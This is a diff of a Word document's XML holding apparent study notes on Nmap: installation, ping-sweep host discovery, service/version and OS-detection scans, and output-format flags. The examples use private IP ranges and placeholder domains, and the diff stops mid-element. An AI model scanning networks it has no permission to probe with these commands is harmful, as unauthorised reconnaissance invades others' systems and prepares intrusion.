--- a/1.nmap.docx
+++ b/1.nmap.docx
@@ -2278,6 +2278,12 @@
     </w:p>
     <w:p/>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
@@ -2314,6 +2320,454 @@
         <w:t xml:space="preserve"> target</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3) Service/Version Scan:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>OR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sTV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>80/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">   open   http    Apache-2.2.2</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>service/version intensity:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>`````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Intensity level 0 to 9, Higher level increases possibilities of correctness (Slow).</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sSV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --version-intensity 8 target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sSV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --version-all target</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>4) OS Scan:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-----------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -O target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sSV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -O target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-----------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Output:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>formats</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>, .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gnmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, .xml</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>oN</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> filename </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>[.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>oG</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> filename </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">   [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gnmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>oX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> filename </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>[ .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>xml ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>oA</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> filename</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">[ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>All ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>

--- a/1.nmap.docx
+++ b/1.nmap.docx
@@ -90,8 +90,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Language: lua</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Language: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lua</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -125,7 +130,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>apt install nmap -y</w:t>
+        <w:t xml:space="preserve">apt install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -y</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -138,12 +159,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>dnf install nmap -y</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>dnf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -y</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -272,12 +318,21 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap --help</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --help</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -287,7 +342,23 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t># nmap -&lt;option&gt;&lt;type_of_scan&gt; &lt;target&gt;</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -&lt;option&gt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>type_of_scan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt; &lt;target&gt;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -317,12 +388,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap -sn target</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -339,7 +435,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>If PING is blocked then -Pn, use ARP Ping for scan:</w:t>
+        <w:t>If PING is blocked then -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Pn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, use ARP Ping for scan:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -357,8 +461,49 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> nmap -sn target -Pn</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Pn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -383,7 +528,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn 192.168.206.133</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.133</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -398,7 +575,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn 192.168.206.133 192.168.206.11</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.133 192.168.206.11</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -413,7 +622,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn 192.168.206.133 10.0.0.1</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.133 10.0.0.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -428,7 +669,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn 192.168.206.1-133</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.1-133</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -443,7 +716,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn 192.168.206.1-133,150</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.1-133,150</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -458,7 +763,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn 192.168.206.1-133 --exclude 192.168.206.10</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.1-133 --exclude 192.168.206.10</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -473,7 +810,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn 192.168.206.0/24</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.0/24</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -488,7 +857,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn 192.168.206.0/24 10.0.0.0/8</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.0/24 10.0.0.0/8</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -503,8 +904,49 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn domain.tld</w:t>
-      </w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>domain.tld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -518,7 +960,55 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn domain.tld example.com</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>domain.tld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> example.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -533,12 +1023,68 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sn -iL ips.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-i [Input]</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>iL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
